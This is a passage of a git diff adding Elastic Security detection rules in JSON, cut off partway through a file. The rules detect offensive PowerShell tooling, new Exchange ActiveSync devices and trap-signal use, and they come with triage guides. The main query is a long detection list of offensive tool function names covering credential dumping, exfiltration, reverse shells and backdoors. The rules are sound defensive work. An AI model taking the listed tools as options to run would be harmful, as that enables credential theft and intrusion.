}, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 10 + }, + "id": "cde1bafa-9f01-4f43-a872-605b678968b0_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_111.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_111.json new file mode 100644 index 00000000000..4f812c3ab4c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_111.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects known PowerShell offensive tooling functions names in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code. This rule aim is to take advantage of that.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell HackTool Script by Function Names", + "note": "## Triage and analysis\n\n### Investigating Potential PowerShell HackTool Script by Function Names\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries often exploit PowerShell's capabilities to execute malicious scripts and perform various attacks. This rule identifies known offensive tooling function names in PowerShell scripts, as attackers commonly use out-of-the-box tools without modifying the code. By monitoring these specific function names, the rule aims to detect and alert potential malicious PowerShell activity.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the script's execution context, such as the user account, privileges, the role of the system on which it was executed, and any relevant timestamps.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate the origin of the PowerShell script, including its source, download method, and any associated URLs or IP addresses.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This rule may generate false positives if legitimate scripts or tools used by administrators contain any of the listed function names. These function names are commonly associated with offensive tooling, but they may also be present in benign scripts or tools.\n- To handle these false positives consider adding exceptions - preferably with a combination of full file path and users.\n\n### Related Rules\n\n- PowerShell Invoke-NinjaCopy script - b8386923-b02c-4b94-986a-d223d9b01f88\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Add-DomainGroupMember\" or \"Add-DomainObjectAcl\" or\n \"Add-RemoteConnection\" or \"Add-ServiceDacl\" or\n \"Add-Win32Type\" or \"Convert-ADName\" or\n \"Convert-LDAPProperty\" or \"ConvertFrom-LDAPLogonHours\" or\n \"ConvertFrom-UACValue\" or \"Copy-ArrayOfMemAddresses\" or\n \"Create-NamedPipe\" or \"Create-ProcessWithToken\" or\n \"Create-RemoteThread\" or \"Create-SuspendedWinLogon\" or\n \"Create-WinLogonProcess\" or \"Emit-CallThreadStub\" or\n \"Enable-SeAssignPrimaryTokenPrivilege\" or \"Enable-SeDebugPrivilege\" or\n \"Enum-AllTokens\" or \"Export-PowerViewCSV\" or\n \"Find-AVSignature\" or \"Find-AppLockerLog\" or\n \"Find-DomainLocalGroupMember\" or \"Find-DomainObjectPropertyOutlier\" or\n \"Find-DomainProcess\" or \"Find-DomainShare\" or\n \"Find-DomainUserEvent\" or \"Find-DomainUserLocation\" or\n \"Find-InterestingDomainAcl\" or \"Find-InterestingDomainShareFile\" or\n \"Find-InterestingFile\" or \"Find-LocalAdminAccess\" or\n \"Find-PSScriptsInPSAppLog\" or \"Find-PathDLLHijack\" or\n \"Find-ProcessDLLHijack\" or \"Find-RDPClientConnection\" or\n \"Get-AllAttributesForClass\" or \"Get-CachedGPPPassword\" or\n \"Get-DecryptedCpassword\" or \"Get-DecryptedSitelistPassword\" or\n \"Get-DelegateType\" or \"New-RelayEnumObject\" or\n \"Get-DomainDFSShare\" or \"Get-DomainDFSShareV1\" or\n \"Get-DomainDFSShareV2\" or \"Get-DomainDNSRecord\" or\n \"Get-DomainDNSZone\" or \"Get-DomainFileServer\" or\n \"Get-DomainForeignGroupMember\" or \"Get-DomainForeignUser\" or\n \"Get-DomainGPO\" or \"Get-DomainGPOComputerLocalGroupMapping\" or\n \"Get-DomainGPOLocalGroup\" or \"Get-DomainGPOUserLocalGroupMapping\" or\n \"Get-DomainGUIDMap\" or \"Get-DomainGroup\" or\n \"Get-DomainGroupMember\" or \"Get-DomainGroupMemberDeleted\" or\n \"Get-DomainManagedSecurityGroup\" or \"Get-DomainOU\" or\n \"Get-DomainObject\" or \"Get-DomainObjectAcl\" or\n \"Get-DomainObjectAttributeHistory\" or \"Get-DomainObjectLinkedAttributeHistory\" or\n \"Get-DomainPolicyData\" or \"Get-DomainSID\" or\n \"Get-DomainSPNTicket\" or \"Get-DomainSearcher\" or\n \"Get-DomainSite\" or \"Get-DomainSubnet\" or\n \"Get-DomainTrust\" or \"Get-DomainTrustMapping\" or\n \"Get-DomainUser\" or \"Get-DomainUserEvent\" or\n \"Get-Forest\" or \"Get-ForestDomain\" or\n \"Get-ForestGlobalCatalog\" or \"Get-ForestSchemaClass\" or\n \"Get-ForestTrust\" or \"Get-GPODelegation\" or\n \"Get-GPPAutologon\" or \"Get-GPPInnerField\" or\n \"Get-GPPInnerFields\" or \"Get-GPPPassword\" or\n \"Get-GptTmpl\" or \"Get-GroupsXML\" or\n \"Get-HttpStatus\" or \"Get-ImageNtHeaders\" or\n \"Get-Keystrokes\" or \"New-SOASerialNumberArray\" or \n \"Get-MemoryProcAddress\" or \"Get-MicrophoneAudio\" or\n \"Get-ModifiablePath\" or \"Get-ModifiableRegistryAutoRun\" or\n \"Get-ModifiableScheduledTaskFile\" or \"Get-ModifiableService\" or\n \"Get-ModifiableServiceFile\" or \"Get-Name\" or\n \"Get-NetComputerSiteName\" or \"Get-NetLocalGroup\" or\n \"Get-NetLocalGroupMember\" or \"Get-NetLoggedon\" or\n \"Get-NetRDPSession\" or \"Get-NetSession\" or\n \"Get-NetShare\" or \"Get-PEArchitecture\" or\n \"Get-PEBasicInfo\" or \"Get-PEDetailedInfo\" or\n \"Get-PathAcl\" or \"Get-PrimaryToken\" or\n \"Get-ProcAddress\" or \"Get-ProcessTokenGroup\" or\n \"Get-ProcessTokenPrivilege\" or \"Get-ProcessTokenType\" or\n \"Get-RegLoggedOn\" or \"Get-RegistryAlwaysInstallElevated\" or\n \"Get-RegistryAutoLogon\" or \"Get-RemoteProcAddress\" or\n \"Get-Screenshot\" or \"Get-ServiceDetail\" or\n \"Get-SiteListPassword\" or \"Get-SitelistField\" or\n \"Get-System\" or \"Get-SystemNamedPipe\" or\n \"Get-SystemToken\" or \"Get-ThreadToken\" or\n \"Get-TimedScreenshot\" or \"Get-TokenInformation\" or\n \"Get-TopPort\" or \"Get-UnattendedInstallFile\" or\n \"Get-UniqueTokens\" or \"Get-UnquotedService\" or\n \"Get-VaultCredential\" or \"Get-VaultElementValue\" or\n \"Get-VirtualProtectValue\" or \"Get-VolumeShadowCopy\" or\n \"Get-WMIProcess\" or \"Get-WMIRegCachedRDPConnection\" or\n \"Get-WMIRegLastLoggedOn\" or \"Get-WMIRegMountedDrive\" or\n \"Get-WMIRegProxy\" or \"Get-WebConfig\" or\n \"Get-Win32Constants\" or \"Get-Win32Functions\" or\n \"Get-Win32Types\" or \"Import-DllImports\" or\n \"Import-DllInRemoteProcess\" or \"Inject-LocalShellcode\" or\n \"Inject-RemoteShellcode\" or \"Install-ServiceBinary\" or\n \"Invoke-CompareAttributesForClass\" or \"Invoke-CreateRemoteThread\" or\n \"Invoke-CredentialInjection\" or \"Invoke-DllInjection\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-ImpersonateUser\" or\n \"Invoke-Kerberoast\" or \"Invoke-MemoryFreeLibrary\" or\n \"Invoke-MemoryLoadLibrary\" or\n \"Invoke-Mimikatz\" or \"Invoke-NinjaCopy\" or\n \"Invoke-PatchDll\" or \"Invoke-Portscan\" or\n \"Invoke-PrivescAudit\" or \"Invoke-ReflectivePEInjection\" or\n \"Invoke-ReverseDnsLookup\" or \"Invoke-RevertToSelf\" or\n \"Invoke-ServiceAbuse\" or \"Invoke-Shellcode\" or\n \"Invoke-TokenManipulation\" or \"Invoke-UserImpersonation\" or\n \"Invoke-WmiCommand\" or \"Mount-VolumeShadowCopy\" or\n \"New-ADObjectAccessControlEntry\" or \"New-DomainGroup\" or\n \"New-DomainUser\" or \"New-DynamicParameter\" or\n \"New-InMemoryModule\" or\n \"New-ThreadedFunction\" or \"New-VolumeShadowCopy\" or\n \"Out-CompressedDll\" or \"Out-EncodedCommand\" or\n \"Out-EncryptedScript\" or \"Out-Minidump\" or\n \"PortScan-Alive\" or \"Portscan-Port\" or\n \"Remove-DomainGroupMember\" or \"Remove-DomainObjectAcl\" or\n \"Remove-RemoteConnection\" or \"Remove-VolumeShadowCopy\" or\n \"Restore-ServiceBinary\" or \"Set-DesktopACLToAllowEveryone\" or\n \"Set-DesktopACLs\" or \"Set-DomainObject\" or\n \"Set-DomainObjectOwner\" or \"Set-DomainUserPassword\" or\n \"Set-ServiceBinaryPath\" or \"Sub-SignedIntAsUnsigned\" or\n \"Test-AdminAccess\" or \"Test-MemoryRangeValid\" or\n \"Test-ServiceDaclPermission\" or \"Update-ExeFunctions\" or\n \"Update-MemoryAddresses\" or \"Update-MemoryProtectionFlags\" or\n \"Write-BytesToMemory\" or \"Write-HijackDll\" or\n \"Write-PortscanOut\" or \"Write-ServiceBinary\" or\n \"Write-UserAddMSI\" or \"Invoke-Privesc\" or\n \"func_get_proc_address\" or \"Invoke-BloodHound\" or\n \"Invoke-HostEnum\" or \"Get-BrowserInformation\" or\n \"Get-DomainAccountPolicy\" or \"Get-DomainAdmins\" or\n \"Get-AVProcesses\" or \"Get-AVInfo\" or\n \"Get-RecycleBin\" or \"Invoke-BruteForce\" or\n \"Get-PassHints\" or \"Invoke-SessionGopher\" or\n \"Get-LSASecret\" or \"Get-PassHashes\" or\n \"Invoke-WdigestDowngrade\" or \"Get-ChromeDump\" or\n \"Invoke-DomainPasswordSpray\" or \"Get-FoxDump\" or\n \"New-HoneyHash\" or \"Invoke-DCSync\" or\n \"Invoke-PowerDump\" or \"Invoke-SSIDExfil\" or\n \"Invoke-PowerShellTCP\" or \"Add-Exfiltration\" or\n \"Do-Exfiltration\" or \"Invoke-DropboxUpload\" or\n \"Invoke-ExfilDataToGitHub\" or \"Invoke-EgressCheck\" or\n \"Invoke-PostExfil\" or \"Create-MultipleSessions\" or\n \"Invoke-NetworkRelay\" or \"New-GPOImmediateTask\" or\n \"Invoke-WMIDebugger\" or \"Invoke-SQLOSCMD\" or\n \"Invoke-SMBExec\" or \"Invoke-PSRemoting\" or\n \"Invoke-ExecuteMSBuild\" or \"Invoke-DCOM\" or\n \"Invoke-InveighRelay\" or \"Invoke-PsExec\" or\n \"Invoke-SSHCommand\" or \"Find-ActiveUsersWMI\" or\n \"Get-SystemDrivesWMI\" or \"Get-ActiveNICSWMI\" or\n \"Remove-Persistence\" or \"DNS_TXT_Pwnage\" or\n \"Execute-OnTime\" or \"HTTP-Backdoor\" or\n \"Add-ConstrainedDelegationBackdoor\" or \"Add-RegBackdoor\" or\n \"Add-ScrnSaveBackdoor\" or \"Gupt-Backdoor\" or\n \"Invoke-ADSBackdoor\" or \"Add-Persistence\" or\n \"Invoke-ResolverBackdoor\" or \"Invoke-EventLogBackdoor\" or\n \"Invoke-DeadUserBackdoor\" or \"Invoke-DisableMachineAcctChange\" or\n \"Invoke-AccessBinary\" or \"Add-NetUser\" or\n \"Invoke-Schtasks\" or \"Invoke-JSRatRegsvr\" or\n \"Invoke-JSRatRundll\" or \"Invoke-PoshRatHttps\" or\n \"Invoke-PsGcatAgent\" or \"Remove-PoshRat\" or\n \"Install-SSP\" or \"Invoke-BackdoorLNK\" or\n \"PowerBreach\" or \"InstallEXE-Persistence\" or\n \"RemoveEXE-Persistence\" or \"Install-ServiceLevel-Persistence\" or\n \"Remove-ServiceLevel-Persistence\" or \"Invoke-Prompt\" or\n \"Invoke-PacketCapture\" or \"Start-WebcamRecorder\" or\n \"Get-USBKeyStrokes\" or \"Invoke-KeeThief\" or\n \"Get-Keystrokes\" or \"Invoke-NetRipper\" or\n \"Get-EmailItems\" or \"Invoke-MailSearch\" or\n \"Invoke-SearchGAL\" or \"Get-WebCredentials\" or\n \"Start-CaptureServer\" or \"Invoke-PowerShellIcmp\" or\n \"Invoke-PowerShellTcpOneLine\" or \"Invoke-PowerShellTcpOneLineBind\" or\n \"Invoke-PowerShellUdp\" or \"Invoke-PowerShellUdpOneLine\" or\n \"Run-EXEonRemote\" or \"Download-Execute-PS\" or\n \"Out-RundllCommand\" or \"Set-RemoteWMI\" or\n \"Set-DCShadowPermissions\" or \"Invoke-PowerShellWMI\" or\n \"Invoke-Vnc\" or \"Invoke-LockWorkStation\" or\n \"Invoke-EternalBlue\" or \"Invoke-ShellcodeMSIL\" or\n \"Invoke-MetasploitPayload\" or \"Invoke-DowngradeAccount\" or\n \"Invoke-RunAs\" or \"ExetoText\" or\n \"Disable-SecuritySettings\" or \"Set-MacAttribute\" or\n \"Invoke-MS16032\" or \"Invoke-BypassUACTokenManipulation\" or\n \"Invoke-SDCLTBypass\" or \"Invoke-FodHelperBypass\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-EnvBypass\" or\n \"Get-ServiceUnquoted\" or \"Get-ServiceFilePermission\" or\n \"Get-ServicePermission\" or\n \"Enable-DuplicateToken\" or \"Invoke-PsUaCme\" or\n \"Invoke-Tater\" or \"Invoke-WScriptBypassUAC\" or\n \"Invoke-AllChecks\" or \"Find-TrustedDocuments\" or\n \"Invoke-Interceptor\" or \"Invoke-PoshRatHttp\" or\n \"Invoke-ExecCommandWMI\" or \"Invoke-KillProcessWMI\" or\n \"Invoke-CreateShareandExecute\" or \"Invoke-RemoteScriptWithOutput\" or\n \"Invoke-SchedJobManipulation\" or \"Invoke-ServiceManipulation\" or\n \"Invoke-PowerOptionsWMI\" or \"Invoke-DirectoryListing\" or\n \"Invoke-FileTransferOverWMI\" or \"Invoke-WMImplant\" or\n \"Invoke-WMIObfuscatedPSCommand\" or \"Invoke-WMIDuplicateClass\" or\n \"Invoke-WMIUpload\" or \"Invoke-WMIRemoteExtract\" or \"Invoke-winPEAS\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\")\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md", + "https://github.com/BC-SECURITY/Empire" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "cde1bafa-9f01-4f43-a872-605b678968b0_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_108.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_108.json new file mode 100644 index 00000000000..3de13898a70 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_108.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "New ActiveSyncAllowedDeviceID Added via PowerShell", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Set-CASMailbox*ActiveSyncAllowedDeviceIDs*\"\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_109.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_109.json new file mode 100644 index 00000000000..f3d5d6eb730 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_109.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "New ActiveSyncAllowedDeviceID Added via PowerShell", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Set-CASMailbox*ActiveSyncAllowedDeviceIDs*\"\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2.json b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2.json new file mode 100644 index 00000000000..6d6580bffbe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identify activity related where adversaries can include a trap command which then allows programs and shells to specify commands that will be executed upon receiving interrupt signals.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Trap Signals Execution", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name == \"trap\" and process.args : \"SIG*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e", + "severity": "low", + "tags": [ + 